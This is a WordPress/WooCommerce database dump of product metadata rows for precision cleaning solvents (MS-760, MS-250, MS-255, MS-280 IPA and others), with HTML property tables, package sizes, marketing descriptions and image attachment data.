INSERT INTO `wp_postmeta` VALUES (17114, 1707, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17115, 1707, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17116, 1707, '_ywtm_content_tab_description', 'A precision cleaning solvent that safety and quickly cleans electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Removes oils, oxidation, and operating erosion dust. Safe for plastics including polycarbonate and ABS. Safe for most elastomers and metals including zinc and magnesium. It replaces HCFC-225 in many applications.'); 
INSERT INTO `wp_postmeta` VALUES (17117, 1708, '_edit_lock', '1474299819:3'); 
INSERT INTO `wp_postmeta` VALUES (17118, 1708, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17119, 1708, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17120, 1708, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17121, 1708, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Compatible with most plastics, elastomers and metals</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td style="text-align: center;" width="180">54°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">1.42 g/cc @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">238 mmHg @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">14.1 N/m</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity</td>\r\n<td style="text-align: center;">0.75 cPs</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17122, 1708, '1367_default_editor', '<strong>MS-760</strong> (12 oz Aerosol)\r\n<strong>MS-760M</strong> (8 oz Aerosol)\r\n<strong>MS-762</strong> (4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17123, 1708, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17124, 1708, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17125, 1708, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17126, 1708, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17127, 1708, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17128, 1708, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17129, 1708, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17130, 1708, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17131, 1708, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17132, 1708, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17133, 1708, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17134, 1708, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17135, 1708, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17136, 1708, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17137, 1708, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17138, 1708, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17139, 1708, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17140, 1708, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17141, 1708, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17142, 1708, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17143, 1708, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17144, 1708, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17145, 1708, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17146, 1708, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17147, 1708, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17148, 1708, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17149, 1708, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17150, 1708, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17151, 1708, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17152, 1708, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17153, 1708, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17154, 1708, '_ywtm_content_tab_description', 'MS-760 and MS-762 Cleaning Agent is a special solvent blend of a hydrofluorocarbon fluid and isopropanol. It is intended for use in the removal of water from nonporous surfaces, as well as cleaning particulate and ionic soils from component parts. This product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. Typical applications include absorption drying, precision and specialty cleaning and rinsing for removing particulates, fingerprints and light soils, from metal, plastic and glass parts. It is an ideal choice for absorption drying where nested parts or complex geometries make water removal difficult or energy intensive.'); 
INSERT INTO `wp_postmeta` VALUES (17155, 1708, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17156, 1710, '_edit_lock', '1474299894:3'); 
INSERT INTO `wp_postmeta` VALUES (17157, 1710, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17158, 1710, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17159, 1710, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17160, 1710, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Compatible with most plastics, elastomers and metals</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Liquid Density</td>\r\n<td style="text-align: center;" width="180">1.49 g/cc @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">48°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">298 mmHg @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">14.1 dyn/cm</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17161, 1710, '1367_default_editor', '<strong>MS-765</strong> (12 oz Aerosol)\r\n<strong>MS-765M </strong>(8 oz Aerosol)\r\n<strong>MS-767 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17162, 1710, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17163, 1710, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17164, 1710, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17165, 1710, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17166, 1710, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17167, 1710, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17168, 1710, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17169, 1710, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17170, 1710, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17171, 1710, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17172, 1710, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17173, 1710, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17174, 1710, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17175, 1710, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17176, 1710, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17177, 1710, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17178, 1710, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17179, 1710, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17180, 1710, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17181, 1710, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17182, 1710, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17183, 1710, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17184, 1710, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17185, 1710, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17186, 1710, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17187, 1710, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17188, 1710, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17189, 1710, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17190, 1710, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17191, 1710, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17192, 1710, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17193, 1710, '_ywtm_content_tab_description', 'This product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. It is ideally suited for precision and specialty cleaning and rinsing. Typical applications include removing particulates, fingerprints and ionic salts, from metal, plastic and glass parts.'); 
INSERT INTO `wp_postmeta` VALUES (17194, 1710, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17195, 1711, '_edit_lock', '1493645484:2'); 
INSERT INTO `wp_postmeta` VALUES (17196, 1711, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17197, 1711, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17198, 1711, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17199, 1711, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Compatible with most plastics, elastomers and metals</li>\r\n 	<li>Chemical and thermal stability</li>\r\n 	<li>Non ozone-depleting</li>\r\n 	<li>Volatile organic compounds: exempt</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Liquid Density</td>\r\n<td style="text-align: center;" width="180">1.58 g/cc</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">55°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">226 mmHg</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">14.1 dyn/cm</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity</td>\r\n<td style="text-align: center;">0.67 cPs</td>\r\n</tr>\r\n<tr>\r\n<td>Heat of Vaporization</td>\r\n<td style="text-align: center;">31.0 cal/g at boiling pt.</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Heat at 20°C</td>\r\n<td style="text-align: center;">1.13 kJ/kg°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17200, 1711, '1367_default_editor', '<strong>MS-250 </strong>(12 oz Aerosol)\r\n<strong>MS-250M </strong>(8 oz Aerosol)\r\n<strong>MS-250SP </strong>(4 oz Aerosol)\r\n<strong>MS-252 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17201, 1711, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17202, 1711, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17203, 1711, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17204, 1711, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17205, 1711, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17206, 1711, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17207, 1711, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17208, 1711, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17209, 1711, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17210, 1711, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17211, 1711, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17212, 1711, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17213, 1711, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17214, 1711, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17215, 1711, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17216, 1711, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17217, 1711, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17218, 1711, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17219, 1711, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17220, 1711, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17221, 1711, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17222, 1711, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17223, 1711, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17224, 1711, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17225, 1711, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17226, 1711, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17227, 1711, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (17228, 1711, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17229, 1711, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17230, 1711, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17231, 1711, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17232, 1711, '_ywtm_content_tab_description', 'PFPE Re-Move™ is a superior solvent cleaner designed to remove all grades of fluorinated lubricants, including KrytoxTM, Castrol Braycote®, Kluber®, Fomblin® and Nye®. This cleaner is for applications where these lubricants need to be completely removed from the surface. Safe for most plastics, elastomers and metals.'); 
INSERT INTO `wp_postmeta` VALUES (17233, 1711, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17234, 1712, '_edit_lock', '1474054847:2'); 
INSERT INTO `wp_postmeta` VALUES (17235, 1712, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17236, 1712, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17237, 1712, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17238, 1712, '312_default_editor', '<ul>\r\n 	<li>Designed to remove a wide range of soils</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Low surface tension</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Compatible with most plastics, elastomers and metals</li>\r\n 	<li>Chemically and thermally stable</li>\r\n 	<li>Non ozone-depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td style="text-align: center;" width="180">38°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">1.33 g/cc</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">460 mmHg</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">16.1 dyn/cm</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity</td>\r\n<td style="text-align: center;">0.49 cPs</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17239, 1712, '1367_default_editor', '<strong>MS-255 </strong>(12 oz Aerosol)\r\n<strong>MS-255M </strong>(8 oz Aerosol)\r\n<strong>MS-257 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17240, 1712, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17241, 1712, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17242, 1712, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17243, 1712, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17244, 1712, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17245, 1712, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17246, 1712, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17247, 1712, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17248, 1712, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17249, 1712, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17250, 1712, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17251, 1712, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17252, 1712, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17253, 1712, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17254, 1712, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17255, 1712, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17256, 1712, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17257, 1712, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17258, 1712, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17259, 1712, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17260, 1712, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17261, 1712, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17262, 1712, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17263, 1712, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17264, 1712, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17265, 1712, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17266, 1712, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17267, 1712, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17268, 1712, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17269, 1712, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17270, 1712, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17271, 1712, '_ywtm_content_tab_description', 'Surface PrepClean™ is a strong cleaning agent designed to clean surfaces prior to applying fluorinated lubricants like Krytox. New, unlubricated components and bearings are typically coated with hydrocarbon-based rust preventative oils to prevent corrosion during storage. Prior to lubricating components and bearings with fluorinated lubricants, it is important to remove these preservatives, because standard rust preventative materials will lower adhesion and reduce the effectiveness of fluorinated oils and greases.\r\n\r\nPrepClean™ can also be used to clean surfaces like PCBs, prior to applying Conformal Coating like our Silicone MS-460H/MS-462H, Acrylic MS-465C/MS-467C, MS-475C/MS-477C and Urethane MS-470C/MS-472C. Also great for cleaning surfaces prior to applying adhesives. Is effective in removing difficult soils like heavy oils, grease, wax and other contaminants. It is an excellent replacement for nPB, HCFC-225, 1,1,1-trichloroethane (1,1,1-TCA) and hydrochlorofluorocarbons (HCFCs) in many applications. MS-\r\n257 can be used in vapor degreasing equipment.'); 
INSERT INTO `wp_postmeta` VALUES (17272, 1712, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17273, 1713, '_edit_lock', '1474299566:3'); 
INSERT INTO `wp_postmeta` VALUES (17274, 1713, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17275, 1713, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17276, 1713, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17277, 1713, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Safe for most plastics, elastomers and metals</li>\r\n 	<li>Noncorrosive</li>\r\n 	<li>Low toxicity, compared to alternative solvents</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td style="text-align: center;" width="180">82°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">0.79 g/ml</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">33 mmHg</td>\r\n</tr>\r\n<tr>\r\n<td>Percent Volatile</td>\r\n<td style="text-align: center;">100%</td>\r\n</tr>\r\n<tr>\r\n<td>Water Content</td>\r\n<td style="text-align: center;">&lt;0.10%</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17278, 1713, '1367_default_editor', '<strong>MS-280</strong> (12 oz Aerosol)\r\n<strong>MS-282 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17279, 1713, '716_default_editor', '<ul>\r\n 	<li>Defluxing</li>\r\n 	<li>Printed circuit board cleaning</li>\r\n 	<li>Contact, relay, cable and connector cleaning</li>\r\n 	<li>Fiber-optics cleaning</li>\r\n 	<li>Stencil cleaning</li>\r\n 	<li>Removal of moisture</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17280, 1713, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17281, 1713, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17282, 1713, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17283, 1713, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17284, 1713, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17285, 1713, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17286, 1713, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17287, 1713, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17288, 1713, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17289, 1713, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17290, 1713, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17291, 1713, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17292, 1713, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17293, 1713, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17294, 1713, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17295, 1713, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17296, 1713, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17297, 1713, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17298, 1713, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17299, 1713, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17300, 1713, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17301, 1713, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17302, 1713, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17303, 1713, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17304, 1713, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17305, 1713, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17306, 1713, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17307, 1713, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17308, 1713, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17309, 1713, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17310, 1713, '_ywtm_content_tab_description', 'IPA Clean, MS-280 and MS-282 are high purity cleaning solvents. They are 99.8% pure anhydrous Isopropyl Alcohol (IPA) that is excellent for cleaning many types of\r\ncontaminants from multiple surfaces, like electronics, plastics, elastomers, metals and wood. Removes water, fluxes, oils, light grease, oxides, organic residues, ionic deposits, some residual glues, some paints, and particulates.'); 
INSERT INTO `wp_postmeta` VALUES (17311, 1713, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17312, 1714, '_wp_attached_file', '2016/09/solvents-solvsys.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17313, 1714, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:28:"2016/09/solvents-solvsys.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"solvents-solvsys-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"solvents-solvsys-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"solvents-solvsys-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"solvents-solvsys-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"solvents-solvsys-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"solvents-solvsys-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"solvents-solvsys-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"solvents-solvsys-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17314, 1716, '_wp_attached_file', '2016/08/aero-duster.jpg'); 
